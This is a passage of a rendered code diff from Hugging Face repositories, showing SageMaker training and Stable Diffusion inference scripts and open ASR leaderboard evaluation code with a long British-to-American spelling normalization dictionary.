+ if step % gradient_accumulation_steps == 0:
986
+ optimizer.step()
987
+ lr_scheduler.step()
988
+ optimizer.zero_grad()
989
+ overall_step += 1
990
+ if isinstance(checkpointing_steps, int):
991
+ output_dir = f'step_{overall_step}'
992
+ if overall_step % checkpointing_steps == 0:
993
+ if args.output_dir is not None:
994
+ output_dir = os.path.join(args.output_dir, output_dir)
995
+ accelerator.save_state(output_dir)
996
+ model.eval()
997
+ for (step, batch) in enumerate(eval_dataloader):
998
+ batch.to(accelerator.device)
999
+ with torch.no_grad():
1000
+ outputs = model(**batch)
1001
+ predictions = outputs.logits.argmax(dim=-1)
1002
+ (predictions, references) = accelerator.gather_for_metrics((predictions, batch['labels']))
1003
+ metric.add_batch(predictions=predictions, references=references)
1004
+ eval_metric = metric.compute()
1005
+ accelerator.print(f'epoch {epoch}:', eval_metric)
1006
+ if args.with_tracking:
1007
+ accelerator.log({'accuracy': eval_metric['accuracy'], 'f1': eval_metric['f1'], 'train_loss': total_loss.item() / len(train_dataloader), 'epoch': epoch}, step=epoch)
1008
+ if checkpointing_steps == 'epoch':
1009
+ output_dir = f'epoch_{epoch}'
1010
+ if args.output_dir is not None:
1011
+ output_dir = os.path.join(args.output_dir, output_dir)
1012
+ accelerator.save_state(output_dir)
1013
+ accelerator.save(accelerator.get_state_dict(model), os.path.join(args.output_dir, 'model.pt'))
1014
+ if args.with_tracking:
1015
+ accelerator.end_training()
1016
+
1017
+ def main():
1018
+ parser = argparse.ArgumentParser(description='Simple example of training script.')
1019
+ parser.add_argument('--mixed_precision', type=str, default='no', choices=['no', 'fp16', 'bf16'], help='Whether to use mixed precision. Choosebetween fp16 and bf16 (bfloat16). Bf16 requires PyTorch >= 1.10.and an Nvidia Ampere GPU.')
1020
+ parser.add_argument('--cpu', action='store_true', help='If passed, will train on the CPU.')
1021
+ parser.add_argument('--checkpointing_steps', type=str, default=None, help="Whether the various states should be saved at the end of every n steps, or 'epoch' for each epoch.")
1022
+ parser.add_argument('--resume_from_checkpoint', type=str, default=None, help='If the training should continue from a checkpoint folder.')
1023
+ parser.add_argument('--with_tracking', action='store_true', help='Whether to load in all available experiment trackers from the environment and use them for logging.')
1024
+ parser.add_argument('--logging_dir', type=str, default=os.path.join(os.environ['SM_OUTPUT_DATA_DIR'], 'logs'), help='Location on where to store experiment tracking logs`')
1025
+ parser.add_argument('--output_dir', type=str, default=os.environ['SM_MODEL_DIR'])
1026
+ parser.add_argument('--training_dir', type=str, default=os.environ['SM_CHANNEL_TRAIN'])
1027
+ parser.add_argument('--validation_dir', type=str, default=os.environ['SM_CHANNEL_VALIDATION'])
1028
+ args = parser.parse_args()
1029
+ config = {'lr': 2e-05, 'num_epochs': 3, 'seed': 42, 'batch_size': 16}
1030
+ training_function(config, args)
1031
+ if __name__ == '__main__':
1032
+ main()
1033
+
1034
+ # File: notebooks-main/sagemaker/23_stable_diffusion_inference/code/inference.py
1035
+ import base64
1036
+ import torch
1037
+ from io import BytesIO
1038
+ from diffusers import StableDiffusionPipeline
1039
+
1040
+ def model_fn(model_dir):
1041
+ pipe = StableDiffusionPipeline.from_pretrained(model_dir, torch_dtype=torch.float16)
1042
+ pipe = pipe.to('cuda')
1043
+ return pipe
1044
+
1045
+ def predict_fn(data, pipe):
1046
+ prompt = data.pop('inputs', data)
1047
+ num_inference_steps = data.pop('num_inference_steps', 50)
1048
+ guidance_scale = data.pop('guidance_scale', 7.5)
1049
+ num_images_per_prompt = data.pop('num_images_per_prompt', 4)
1050
+ generated_images = pipe(prompt, num_inference_steps=num_inference_steps, guidance_scale=guidance_scale, num_images_per_prompt=num_images_per_prompt)['images']
1051
+ encoded_images = []
1052
+ for image in generated_images:
1053
+ buffered = BytesIO()
1054
+ image.save(buffered, format='JPEG')
1055
+ encoded_images.append(base64.b64encode(buffered.getvalue()).decode())
1056
+ return {'generated_images': encoded_images}
1057
+
huggingface_open-muse.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_open_asr_leaderboard.txt ADDED
@@ -0,0 +1,882 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # File: open_asr_leaderboard-main/ctranslate2/run_eval.py
2
+ """"""
3
+ import argparse
4
+ import os
5
+ import time
6
+ import evaluate
7
+ from faster_whisper import WhisperModel
8
+ from tqdm import tqdm
9
+ from normalizer import data_utils
10
+ wer_metric = evaluate.load('wer')
11
+
12
+ def main(args) -> None:
13
+ asr_model = WhisperModel(model_size_or_path=args.model_id, compute_type='float16', device='cuda', device_index=args.device)
14
+
15
+ def benchmark(batch):
16
+ start_time = time.time()
17
+ (segments, _) = asr_model.transcribe(batch['audio']['array'], language='en')
18
+ outputs = [segment._asdict() for segment in segments]
19
+ batch['transcription_time_s'] = time.time() - start_time
20
+ batch['predictions'] = data_utils.normalizer(''.join([segment['text'] for segment in outputs])).strip()
21
+ batch['references'] = batch['norm_text']
22
+ return batch
23
+ if args.warmup_steps is not None:
24
+ dataset = data_utils.load_data(args)
25
+ dataset = data_utils.prepare_data(dataset)
26
+ if args.streaming:
27
+ warmup_dataset = dataset.take(args.warmup_steps)
28
+ else:
29
+ warmup_dataset = dataset.select(range(min(args.warmup_steps, len(dataset))))
30
+ warmup_dataset = iter(warmup_dataset.map(benchmark, remove_columns=['audio']))
31
+ for _ in tqdm(warmup_dataset, desc='Warming up...'):
32
+ continue
33
+ dataset = data_utils.load_data(args)
34
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
35
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples!')
36
+ if args.streaming:
37
+ dataset = dataset.take(args.max_eval_samples)
38
+ else:
39
+ dataset = dataset.select(range(min(args.max_eval_samples, len(dataset))))
40
+ dataset = data_utils.prepare_data(dataset)
41
+ dataset = dataset.map(benchmark, remove_columns=['audio'])
42
+ all_results = {'audio_length_s': [], 'transcription_time_s': [], 'predictions': [], 'references': []}
43
+ result_iter = iter(dataset)
44
+ for result in tqdm(result_iter, desc='Samples...'):
45
+ for key in all_results:
46
+ all_results[key].append(result[key])
47
+ manifest_path = data_utils.write_manifest(all_results['references'], all_results['predictions'], args.model_id, args.dataset_path, args.dataset, args.split, audio_length=all_results['audio_length_s'], transcription_time=all_results['transcription_time_s'])
48
+ print('Results saved at path:', os.path.abspath(manifest_path))
49
+ wer = wer_metric.compute(references=all_results['references'], predictions=all_results['predictions'])
50
+ wer = round(100 * wer, 2)
51
+ rtfx = round(sum(all_results['audio_length_s']) / sum(all_results['transcription_time_s']), 2)
52
+ print('WER:', wer, '%', 'RTFx:', rtfx)
53
+ if __name__ == '__main__':
54
+ parser = argparse.ArgumentParser()
55
+ parser.add_argument('--model_id', type=str, required=True, help='Model identifier. Should be loadable with faster-whisper')
56
+ parser.add_argument('--dataset_path', type=str, default='esb/datasets', help='Dataset path. By default, it is `esb/datasets`')
57
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `'librispeech_asr` for the LibriSpeech ASR dataset, or `'common_voice'` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
58
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `'validation`' for the dev split, or `'test'` for the test split.")
59
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
60
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
61
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
62
+ parser.add_argument('--warmup_steps', type=int, default=5, help='Number of warm-up steps to run before launching the timed runs.')
63
+ args = parser.parse_args()
64
+ parser.set_defaults(streaming=False)
65
+ main(args)
66
+
67
+ # File: open_asr_leaderboard-main/nemo_asr/run_eval.py
68
+ import argparse
69
+ import os
70
+ import torch
71
+ import evaluate
72
+ import soundfile
73
+ from tqdm import tqdm
74
+ from normalizer import data_utils
75
+ import numpy as np
76
+ from nemo.collections.asr.models import ASRModel
77
+ import time
78
+ wer_metric = evaluate.load('wer')
79
+
80
+ def main(args):
81
+ DATA_CACHE_DIR = os.path.join(os.getcwd(), 'audio_cache')
82
+ DATASET_NAME = args.dataset
83
+ SPLIT_NAME = args.split
84
+ CACHE_DIR = os.path.join(DATA_CACHE_DIR, DATASET_NAME, SPLIT_NAME)
85
+ if not os.path.exists(CACHE_DIR):
86
+ os.makedirs(CACHE_DIR)
87
+ if args.device >= 0:
88
+ device = torch.device(f'cuda:{args.device}')
89
+ compute_dtype = torch.bfloat16
90
+ else:
91
+ device = torch.device('cpu')
92
+ compute_dtype = torch.float32
93
+ if args.model_id.endswith('.nemo'):
94
+ asr_model = ASRModel.restore_from(args.model_id, map_location=device)
95
+ else:
96
+ asr_model = ASRModel.from_pretrained(args.model_id, map_location=device)
97
+ asr_model.to(compute_dtype)
98
+ asr_model.eval()
99
+ dataset = data_utils.load_data(args)
100
+
101
+ def download_audio_files(batch):
102
+ audio_paths = []
103
+ durations = []
104
+ for (id, sample) in zip(batch['id'], batch['audio']):
105
+ audio_path = os.path.join(CACHE_DIR, f'{id}.wav')
106
+ if not os.path.exists(audio_path):
107
+ os.makedirs(os.path.dirname(audio_path), exist_ok=True)
108
+ soundfile.write(audio_path, np.float32(sample['array']), 16000)
109
+ audio_paths.append(audio_path)
110
+ durations.append(len(sample['array']) / 16000)
111
+ batch['references'] = batch['norm_text']
112
+ batch['audio_filepaths'] = audio_paths
113
+ batch['durations'] = durations
114
+ return batch
115
+ if args.max_eval_samples is not None and args.max_eval_samples > 0:
116
+ print(f'Subsampling dataset to first {args.max_eval_samples} samples !')
117
+ dataset = dataset.take(args.max_eval_samples)
118
+ dataset = data_utils.prepare_data(dataset)
119
+ if asr_model.cfg.decoding.strategy != 'beam':
120
+ asr_model.cfg.decoding.strategy = 'greedy_batch'
121
+ asr_model.change_decoding_strategy(asr_model.cfg.decoding)
122
+ dataset = dataset.map(download_audio_files, batch_size=args.batch_size, batched=True, remove_columns=['audio'])
123
+ all_data = {'audio_filepaths': [], 'durations': [], 'references': []}
124
+ data_itr = iter(dataset)
125
+ for data in tqdm(data_itr, desc='Downloading Samples'):
126
+ for key in all_data:
127
+ all_data[key].append(data[key])
128
+ sorted_indices = sorted(range(len(all_data['durations'])), key=lambda k: all_data['durations'][k], reverse=True)
129
+ all_data['audio_filepaths'] = [all_data['audio_filepaths'][i] for i in sorted_indices]
130
+ all_data['references'] = [all_data['references'][i] for i in sorted_indices]
131
+ all_data['durations'] = [all_data['durations'][i] for i in sorted_indices]
132
+ total_time = 0
133
+ for _ in range(2):
134
+ if _ == 0:
135
+ audio_files = all_data['audio_filepaths'][:args.batch_size * 4]
136
+ else:
137
+ audio_files = all_data['audio_filepaths']
138
+ start_time = time.time()
139
+ with torch.cuda.amp.autocast(enabled=False, dtype=compute_dtype), torch.inference_mode(), torch.no_grad():
140
+ if 'canary' in args.model_id:
141
+ transcriptions = asr_model.transcribe(audio_files, batch_size=args.batch_size, verbose=False, pnc='no', num_workers=1)
142
+ else:
143
+ transcriptions = asr_model.transcribe(audio_files, batch_size=args.batch_size, verbose=False, num_workers=1)
144
+ end_time = time.time()
145
+ if _ == 1:
146
+ total_time += end_time - start_time
147
+ total_time = total_time
148
+ if isinstance(transcriptions, tuple) and len(transcriptions) == 2:
149
+ transcriptions = transcriptions[0]
150
+ predictions = [data_utils.normalizer(pred) for pred in transcriptions]
151
+ avg_time = total_time / len(all_data['audio_filepaths'])
152
+ manifest_path = data_utils.write_manifest(all_data['references'], predictions, args.model_id, args.dataset_path, args.dataset, args.split, audio_length=all_data['durations'], transcription_time=[avg_time] * len(all_data['audio_filepaths']))
153
+ print('Results saved at path:', os.path.abspath(manifest_path))
154
+ wer = wer_metric.compute(references=all_data['references'], predictions=predictions)
155
+ wer = round(100 * wer, 2)
156
+ audio_length = sum(all_data['durations'])
157
+ rtfx = audio_length / total_time
158
+ rtfx = round(rtfx, 2)
159
+ print('RTFX:', rtfx)
160
+ print('WER:', wer, '%')
161
+ if __name__ == '__main__':
162
+ parser = argparse.ArgumentParser()
163
+ parser.add_argument('--model_id', type=str, required=True, help='Model identifier. Should be loadable with NVIDIA NeMo.')
164
+ parser.add_argument('--dataset_path', type=str, default='esb/datasets', help='Dataset path. By default, it is `esb/datasets`')
165
+ parser.add_argument('--dataset', type=str, required=True, help="Dataset name. *E.g.* `'librispeech_asr` for the LibriSpeech ASR dataset, or `'common_voice'` for Common Voice. The full list of dataset names can be found at `https://huggingface.co/datasets/esb/datasets`")
166
+ parser.add_argument('--split', type=str, default='test', help="Split of the dataset. *E.g.* `'validation`' for the dev split, or `'test'` for the test split.")
167
+ parser.add_argument('--device', type=int, default=-1, help='The device to run the pipeline on. -1 for CPU (default), 0 for the first GPU and so on.')
168
+ parser.add_argument('--batch_size', type=int, default=32, help='Number of samples to go through each streamed batch.')
169
+ parser.add_argument('--max_eval_samples', type=int, default=None, help='Number of samples to be evaluated. Put a lower number e.g. 64 for testing this script.')
170
+ parser.add_argument('--no-streaming', dest='streaming', action='store_false', help="Choose whether you'd like to download the entire dataset or stream it during the evaluation.")
171
+ args = parser.parse_args()
172
+ parser.set_defaults(streaming=True)
173
+ main(args)
174
+
175
+ # File: open_asr_leaderboard-main/normalizer/data_utils.py
176
+ from datasets import load_dataset, Audio
177
+ from normalizer import EnglishTextNormalizer
178
+ from .eval_utils import read_manifest, write_manifest
179
+
180
+ def is_target_text_in_range(ref):
181
+ if ref.strip() == 'ignore time segment in scoring':
182
+ return False
183
+ else:
184
+ return ref.strip() != ''
185
+
186
+ def get_text(sample):
187
+ if 'text' in sample:
188
+ return sample['text']
189
+ elif 'sentence' in sample:
190
+ return sample['sentence']
191
+ elif 'normalized_text' in sample:
192
+ return sample['normalized_text']
193
+ elif 'transcript' in sample:
194
+ return sample['transcript']
195
+ elif 'transcription' in sample:
196
+ return sample['transcription']
197
+ else:
198
+ raise ValueError(f"Expected transcript column of either 'text', 'sentence', 'normalized_text' or 'transcript'. Got sample of .join{{sample.keys()}}. Ensure a text column name is present in the dataset.")
199
+ normalizer = EnglishTextNormalizer()
200
+
201
+ def normalize(batch):
202
+ batch['original_text'] = get_text(batch)
203
+ batch['norm_text'] = normalizer(batch['original_text'])
204
+ return batch
205
+
206
+ def load_data(args):
207
+ dataset = load_dataset(args.dataset_path, args.dataset, split=args.split, streaming=args.streaming, token=True)
208
+ return dataset
209
+
210
+ def prepare_data(dataset):
211
+ dataset = dataset.cast_column('audio', Audio(sampling_rate=16000))
212
+ dataset = dataset.map(normalize)
213
+ dataset = dataset.filter(is_target_text_in_range, input_columns=['norm_text'])
214
+ return dataset
215
+
216
+ # File: open_asr_leaderboard-main/normalizer/english_abbreviations.py
217
+ english_spelling_normalizer = {'accessorise': 'accessorize', 'accessorised': 'accessorized', 'accessorises': 'accessorizes', 'accessorising': 'accessorizing', 'acclimatisation': 'acclimatization', 'acclimatise': 'acclimatize', 'acclimatised': 'acclimatized', 'acclimatises': 'acclimatizes', 'acclimatising': 'acclimatizing', 'accoutrements': 'accouterments', 'aeon': 'eon', 'aeons': 'eons', 'aerogramme': 'aerogram', 'aerogrammes': 'aerograms', 'aeroplane': 'airplane', 'aeroplanes': 'airplanes', 'aesthete': 'esthete', 'aesthetes': 'esthetes', 'aesthetic': 'esthetic', 'aesthetically': 'esthetically', 'aesthetics': 'esthetics', 'aetiology': 'etiology', 'ageing': 'aging', 'aggrandisement': 'aggrandizement', 'agonise': 'agonize', 'agonised': 'agonized', 'agonises': 'agonizes', 'agonising': 'agonizing', 'agonisingly': 'agonizingly', 'almanack': 'almanac', 'almanacks': 'almanacs', 'aluminium': 'aluminum', 'amortisable': 'amortizable', 'amortisation': 'amortization', 'amortisations': 'amortizations', 'amortise': 'amortize', 'amortised': 'amortized', 'amortises': 'amortizes', 'amortising': 'amortizing', 'amphitheatre': 'amphitheater', 'amphitheatres': 'amphitheaters', 'anaemia': 'anemia', 'anaemic': 'anemic', 'anaesthesia': 'anesthesia', 'anaesthetic': 'anesthetic', 'anaesthetics': 'anesthetics', 'anaesthetise': 'anesthetize', 'anaesthetised': 'anesthetized', 'anaesthetises': 'anesthetizes', 'anaesthetising': 'anesthetizing', 'anaesthetist': 'anesthetist', 'anaesthetists': 'anesthetists', 'anaesthetize': 'anesthetize', 'anaesthetized': 'anesthetized', 'anaesthetizes': 'anesthetizes', 'anaesthetizing': 'anesthetizing', 'analogue': 'analog', 'analogues': 'analogs', 'analyse': 'analyze', 'analysed': 'analyzed', 'analyses': 'analyzes', 'analysing': 'analyzing', 'anglicise': 'anglicize', 'anglicised': 'anglicized', 'anglicises': 'anglicizes', 'anglicising': 'anglicizing', 'annualised': 'annualized', 'antagonise': 'antagonize', 'antagonised': 'antagonized', 'antagonises': 'antagonizes', 'antagonising': 'antagonizing', 'apologise': 'apologize', 'apologised': 'apologized', 'apologises': 'apologizes', 'apologising': 'apologizing', 'appal': 'appall', 'appals': 'appalls', 'appetiser': 'appetizer', 'appetisers': 'appetizers', 'appetising': 'appetizing', 'appetisingly': 'appetizingly', 'arbour': 'arbor', 'arbours': 'arbors', 'archaeologically': 'archeologically', 'archaeologist': 'archeologist', 'archaeologists': 'archeologists', 'archaeology': 'archeology</span>', 'archeological': 'archaeological', 'ardour': 'ardor', 'armour': 'armor', 'armoured': 'armored', 'armourer': 'armorer', 'armourers': 'armorers', 'armouries': 'armories', 'armoury': 'armory', 'artefact': 'artifact', 'artefacts': 'artifacts', 'authorise': 'authorize', 'authorised': 'authorized', 'authorises': 'authorizes', 'authorising': 'authorizing', 'axe': 'ax', 'backpedalled': 'backpedaled', 'backpedalling': 'backpedaling', 'bannister': 'banister', 'bannisters': 'banisters', 'baptise': 'baptize', 'baptised': 'baptized', 'baptises': 'baptizes', 'baptising': 'baptizing', 'bastardise': 'bastardize', 'bastardised': 'bastardized', 'bastardises': 'bastardizes', 'bastardising': 'bastardizing', 'battleax': 'battleaxe', 'baulk': 'balk', 'baulked': 'balked', 'baulking': 'balking', 'baulks': 'balks', 'bedevilled': 'bedeviled', 'bedevilling': 'bedeviling', 'behaviour': 'behavior', 'behavioural': 'behavioral', 'behaviourism': 'behaviorism', 'behaviourist': 'behaviorist', 'behaviourists': 'behaviorists', 'behaviours': 'behaviors', 'behove': 'behoove', 'behoved': 'behooved', 'behoves': 'behooves', 'bejewelled': 'bejeweled', 'belabour': 'belabor', 'belaboured': 'belabored', 'belabouring': 'belaboring', 'belabours': 'belabors', 'bevelled': 'beveled', 'bevvies': 'bevies', 'bevvy': 'bevy', 'biassed': 'biased', 'biassing': 'biasing', 'bingeing': 'binging', 'bougainvillaea': 'bougainvillea', 'bougainvillaeas': 'bougainvilleas', 'bowdlerise': 'bowdlerize', 'bowdlerised': 'bowdlerized', 'bowdlerises': 'bowdlerizes', 'bowdlerising': 'bowdlerizing', 'breathalyse': 'breathalyze', 'breathalysed': 'breathalyzed', 'breathalyser': 'breathalyzer', 'breathalysers': 'breathalyzers', 'breathalyses': 'breathalyzes', 'breathalysing': 'breathalyzing', 'brutalise': 'brutalize', 'brutalised': 'brutalized', 'brutalises': 'brutalizes', 'brutalising': 'brutalizing', 'busses': 'buses', 'bussing': 'busing', 'caesarean': 'cesarean', 'caesareans': 'cesareans', 'calibre': 'caliber', 'calibres': 'calibers', 'calliper': 'caliper', 'callipers': 'calipers', 'callisthenics': 'calisthenics', 'canalise': 'canalize', 'canalised': 'canalized', 'canalises': 'canalizes', 'canalising': 'canalizing', 'cancelation': 'cancellation', 'cancelations': 'cancellations', 'cancelled': 'canceled', 'cancelling': 'canceling', 'candour': 'candor', 'cannibalise': 'cannibalize', 'cannibalised': 'cannibalized', 'cannibalises': 'cannibalizes', 'cannibalising': 'cannibalizing', 'canonise': 'canonize', 'canonised': 'canonized', 'canonises': 'canonizes', 'canonising': 'canonizing', 'capitalise': 'capitalize', 'capitalised': 'capitalized', 'capitalises': 'capitalizes', 'capitalising': 'capitalizing', 'caramelise': 'caramelize', 'caramelised': 'caramelized', 'caramelises': 'caramelizes', 'caramelising': 'caramelizing', 'carbonise': 'carbonize', 'carbonised': 'carbonized', 'carbonises': 'carbonizes', 'carbonising': 'carbonizing', 'carolled': 'caroled', 'carolling': 'caroling', 'catalogue': 'catalog', 'catalogued': 'cataloged', 'catalogues': 'catalogs', 'cataloguing': 'cataloging', 'catalyse': 'catalyze', 'catalysed': 'catalyzed', 'catalyses': 'catalyzes', 'catalysing': 'catalyzing', 'categorise': 'categorize', 'categorised': 'categorized', 'categorises': 'categorizes', 'categorising': 'categorizing', 'cauterise': 'cauterize', 'cauterised': 'cauterized', 'cauterises': 'cauterizes', 'cauterising': 'cauterizing', 'cavilled': 'caviled', 'cavilling': 'caviling', 'centigramme': 'centigram', 'centigrammes': 'centigrams', 'centilitre': 'centiliter', 'centilitres': 'centiliters', 'centimetre': 'centimeter', 'centimetres': 'centimeters', 'centralise': 'centralize', 'centralised': 'centralized', 'centralises': 'centralizes', 'centralising': 'centralizing', 'centre': 'center', 'centred': 'centered', 'centrefold': 'centerfold', 'centrefolds': 'centerfolds', 'centrepiece': 'centerpiece', 'centrepieces': 'centerpieces', 'centres': 'centers', 'channelled': 'channeled', 'channelling': 'channeling', 'characterise': 'characterize', 'characterised': 'characterized', 'characterises': 'characterizes', 'characterising': 'characterizing', 'cheque': 'check', 'chequebook': 'checkbook', 'chequebooks': 'checkbooks', 'chequered': 'checkered', 'cheques': 'checks', 'chilli': 'chili', 'chimaera': 'chimera', 'chimaeras': 'chimeras', 'chiselled': 'chiseled', 'chiselling': 'chiseling', 'circularise': 'circularize', 'circularised': 'circularized', 'circularises': 'circularizes', 'circularising': 'circularizing', 'civilise': 'civilize', 'civilised': 'civilized', 'civilises': 'civilizes', 'civilising': 'civilizing', 'clamour': 'clamor', 'clamoured': 'clamored', 'clamouring': 'clamoring', 'clamours': 'clamors', 'clangour': 'clangor', 'clarinettist': 'clarinetist', 'clarinettists': 'clarinetists', 'collectivise': 'collectivize', 'collectivised': 'collectivized', 'collectivises': 'collectivizes', 'collectivising': 'collectivizing', 'colonisation': 'colonization', 'colonise': 'colonize', 'colonised': 'colonized', 'coloniser': 'colonizer', 'colonisers': 'colonizers', 'colonises': 'colonizes', 'colonising': 'colonizing', 'colour': 'color', 'colourant': 'colorant', 'colourants': 'colorants', 'coloured': 'colored', 'coloureds': 'coloreds', 'colourful': 'colorful', 'colourfully': 'colorfully', 'colouring': 'coloring', 'colourize': 'colorize', 'colourized': 'colorized', 'colourizes': 'colorizes', 'colourizing': 'colorizing', 'colourless': 'colorless', 'colours': 'colors', 'commercialise': 'commercialize', 'commercialised': 'commercialized', 'commercialises': 'commercializes', 'commercialising': 'commercializing', 'compartmentalise': 'compartmentalize', 'compartmentalised': 'compartmentalized', 'compartmentalises': 'compartmentalizes', 'compartmentalising': 'compartmentalizing', 'computerise': 'computerize', 'computerised': 'computerized', 'computerises': 'computerizes', 'computerising': 'computerizing', 'conceptualise': 'conceptualize', 'conceptualised': 'conceptualized', 'conceptualises': 'conceptualizes', 'conceptualising': 'conceptualizing', 'connexion': 'connection', 'connexions': 'connections', 'contextualise': 'contextualize', 'contextualised': 'contextualized', 'contextualises': 'contextualizes', 'contextualising': 'contextualizing', 'cosier': 'cozier', 'cosies': 'cozies', 'cosiest': 'coziest', 'cosily': 'cozily', 'cosiness': 'coziness', 'cosy': 'cozy', 'councillor': 'councilor', 'councillors': 'councilors', 'counselled': 'counseled', 'counselling': 'counseling', 'counsellor': 'counselor', 'counsellors': 'counselors', 'crenelated': 'crenellated', 'criminalise': 'criminalize', 'criminalised': 'criminalized', 'criminalises': 'criminalizes', 'criminalising': 'criminalizing', 'criticise': 'criticize', 'criticised': 'criticized', 'criticises': 'criticizes', 'criticising': 'criticizing', 'crueller': 'crueler', 'cruellest': 'cruelest', 'crystallisation': 'crystallization', 'crystallise': 'crystallize', 'crystallised': 'crystallized', 'crystallises': 'crystallizes', 'crystallising': 'crystallizing', 'cudgelled': 'cudgeled', 'cudgelling': 'cudgeling', 'customise': 'customize', 'customised': 'customized', 'customises': 'customizes', 'customising': 'customizing', 'cypher': 'cipher', 'cyphers': 'ciphers', 'decentralisation': 'decentralization', 'decentralise': 'decentralize', 'decentralised': 'decentralized', 'decentralises': 'decentralizes', 'decentralising': 'decentralizing', 'decriminalisation': 'decriminalization', 'decriminalise': 'decriminalize', 'decriminalised': 'decriminalized', 'decriminalises': 'decriminalizes', 'decriminalising': 'decriminalizing', 'defence': 'defense', 'defenceless': 'defenseless', 'defences': 'defenses', 'dehumanisation': 'dehumanization', 'dehumanise': 'dehumanize', 'dehumanised': 'dehumanized', 'dehumanises': 'dehumanizes', 'dehumanising': 'dehumanizing', 'demeanour': 'demeanor', 'demilitarisation': 'demilitarization', 'demilitarise': 'demilitarize', 'demilitarised': 'demilitarized', 'demilitarises': 'demilitarizes', 'demilitarising': 'demilitarizing', 'demobilisation': 'demobilization', 'demobilise': 'demobilize', 'demobilised': 'demobilized', 'demobilises': 'demobilizes', 'demobilising': 'demobilizing', 'democratisation': 'democratization', 'democratise': 'democratize', 'democratised': 'democratized', 'democratises': 'democratizes', 'democratising': 'democratizing', 'demonise': 'demonize', 'demonised': 'demonized', 'demonises': 'demonizes', 'demonising': 'demonizing', 'demoralisation': 'demoralization', 'demoralise': 'demoralize', 'demoralised': 'demoralized', 'demoralises': 'demoralizes', 'demoralising': 'demoralizing', 'denationalisation': 'denationalization', 'denationalise': 'denationalize', 'denationalised': 'denationalized', 'denationalises': 'denationalizes', 'denationalising': 'denationalizing', 'deodorise': 'deodorize', 'deodorised': 'deodorized', 'deodorises': 'deodorizes', 'deodorising': 'deodorizing', 'depersonalise': 'depersonalize', 'depersonalised': 'depersonalized', 'depersonalises': 'depersonalizes', 'depersonalising': 'depersonalizing', 'deputise': 'deputize', 'deputised': 'deputized', 'deputises': 'deputizes', 'deputising': 'deputizing', 'desensitisation': 'desensitization', 'desensitise': 'desensitize', 'desensitised': 'desensitized', 'desensitises': 'desensitizes', 'desensitising': 'desensitizing', 'destabilisation': 'destabilization', 'destabilise': 'destabilize', 'destabilised': 'destabilized', 'destabilises': 'destabilizes', 'destabilising': 'destabilizing', 'dialled': 'dialed', 